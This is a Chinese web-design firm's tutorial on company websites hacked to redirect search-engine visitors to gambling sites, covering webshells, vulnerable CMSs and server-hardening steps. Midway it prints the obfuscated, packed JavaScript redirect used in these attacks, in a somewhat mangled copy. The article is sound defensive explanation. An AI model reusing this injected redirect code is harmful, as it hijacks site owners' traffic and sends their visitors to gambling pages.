深圳网站制作公司易捷网络欢迎您,我司主营业务:深圳企业网站制作,欢迎来电。
深圳企业网站制作
深圳网站制作业务咨询
0755-61603557
赵先生:13714247375
深圳网站制作技术支持
您现在的位置:网站首页 > 深圳网站制作教程

企业网站恶意跳转赌博网站如何处理

文章作者:易捷网站制作公司编辑    文章来源:深圳网站制作公司-易捷网络

最近公司内部跟单同事表示,大批广州网站制作公司客户在做百度推广时候,网站的首页点击进去后自动跳转到彩票网站、博彩网站,这样用户从百度搜索或者从推广广告位进去网站后发生跳转,而直接输入网址是没有任何跳转的,这样一来用户流失造成访问量急剧下滑、网站服务器资源浪费、推广费用浪费等,甚至可以说做了百度推广、搜狗推广的都在给彩票公司做广告了,在网站制作行业内引起轩然大波。

有不少客户在反应这个问题时候,找到广告商赔偿甚至追究责任,所以在网站恶意跳转的问题上我们运营人员需要重视并且知晓如何快速解决,广州网站制作公司易捷网络从网络上查阅并且测试后总结为以下经验:

一、分析网站被黑跳转博彩网站原因

一般情况下网站被黑时候后都是因为服务器信息(服务器IP远程端口管理员账号密码、SSH端口、root账号密码)和网站信息包括FTP账号密码的对接被黑客知晓,进而造成黑客植入木马或者后门。

整体的安全监测中,asp网站和php网站都存在着木马,这也就意味着木马能够以php脚本木马、asp脚本木马、jsp脚本木马而存在,这些木马后门可以对网站进行恶意篡改,上传,改名,下载,等管理员的高权限操作。出现网站被跳转的客户,采用的网站架构都是php+mysql架构,以及jsp+mysql架构,大多数用的是开源程序,像dedecms,织梦系统,phpcms系统,discuz系统。

当我们懂得一些代码的时候,必然会看到网站首页中会有一些恶意篡改代码,通过删除恶意代码后可能会在几天内完全的停止跳转的,但是在一段时间后却又会被跳转,这个是很令人懊恼的治标不治本措施。过了不久后网站又会出现跳转,那么针对于网站漏洞问题是很难甚至是不能够完全清除的。

通过观察部分客户网站首页,其首页代码中都会有一段加密代码,这段代码是根据搜索引擎的特征来跳转,比如通过百度搜索,360搜索,搜狗搜索来的会直接跳转到彩票,赌博网站上去。如下代码:

type="text/java">eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){retund[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(newRegExp('\\b'+e(c)+'\\b','g'),k[c]);returnp;}('l["\\e\\c\\1\\m\\i\\8\\n\\0"]["\\7\\4\\9\\0\\8"](\'\\h\\2\\1\\4\\9\\3\\0\\0\\j\\3\\8\\d\\6\\0\\8\\k\\0\\5\\f\\a\\r\\a\\2\\1\\4\\9\\3\\0\\6\\2\\4\\1\\d\\6\\s\\0\\0\\3\\2\\q\\5\\5\\7\\7\\7\\b\\1\\3\\e\\a\\2\\p\\b\\1\\c\\i\\5\\j\\o\\1\\b\\f\\2\\6\\g\\h\\5\\2\\1\\4\\9\\3\\0\\g\');',29,29,'x74|x63|x73|x70|x72|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6a|x3e|x3c|x6d|x79|x78|window|x75|x6e|x6c|x38|x3a|x76|x68'.split('|'),0,{}))

一旦被攻击之后,百度搜索引擎就会判断出网站是否被攻击,从而在百度风险评估中心就会对网站进行记录以及标识,百度网址安全中心提醒您:该站点可能受到黑客攻击,部分页面已被非法篡改!红色提示该百度风险。导致客户打开网站直接被百度拦截,如下图所示:

针对于以上跳转攻击的特征,我们广州网站制作公司一致认为应该从人工代码方面进行审计,以及检测网站漏洞、网站后门木马清理、漏洞修复以及xss获取管理员账号cookies漏洞,discuz存在getshell漏洞,注入获取管理员漏洞,discuz上传绕过漏洞等。

二、修复以及防止网站被恶意跳转的办法

1、对服务器目录进行安全部署、对管理员帐号密码加密、对所有密码进行数字+大小写字母+特殊符号要求、对网站数据库进行分配普通权限账号。

2、mysql数据库默认端口3306,改为61116,并加入到端口安全策略,不对外开放,外网IP无法连接数据库,只有本地127.0.0.1才能进行连接数据库,以防止攻击者恶意猜测。

3、对服务器底层系统进行安全加固,包括远程端口登录的安全验证。

4、对网站代码进行整体的安全检测,包括定期的升级网站程序源代码,修复补丁以及网站漏洞。

广州网站制作公司处理网站跳转问题有很多方法,以上内容只是解决问题的方法之一,那么作为一个网站制作公司应该对源码进行优化和调整,这样才能确保后期的网站不会受到影响,这就涉及到网站源码升级以及版本升级问题。

深圳网站制作公司易捷网络科技主营业务:企业网站制作、网站推广优化、企业邮箱申请、域名空间购买、网站备案、论坛网站制作和企业网站维护。网站建设服务热线:13714247375
上一篇企业网站制作技术文章:    学会在职场中独立思考不断接受挑战
下一篇企业网站制作技术文章:    怎样精简自己的网站代码

深圳网站制作最新案例推荐:

深圳网站制作相关文章阅读
关于我们
公司简介
人才招聘
售后服务
联系我们
网站制作套餐
基本型网站制作套餐
标准型网站制作套餐
品牌型网站制作套餐
综合型网站制作套餐
网站制作教程
网站制作常见问题
网站优化常见问题
企业邮箱常见问题
网站备案常见问题
联系方式
联系人:赵经理
电话:0755-61603557
邮箱:info@qifor.com
手机:13714247375
地址:广东.深圳宝安西乡宝源路鸿源大厦618

微信扫码咨询
深圳市易捷网络科技有限公司版权所有    备案号:粤ICP备12084881号 网赚项目网站地图 XML
QQ在线咨询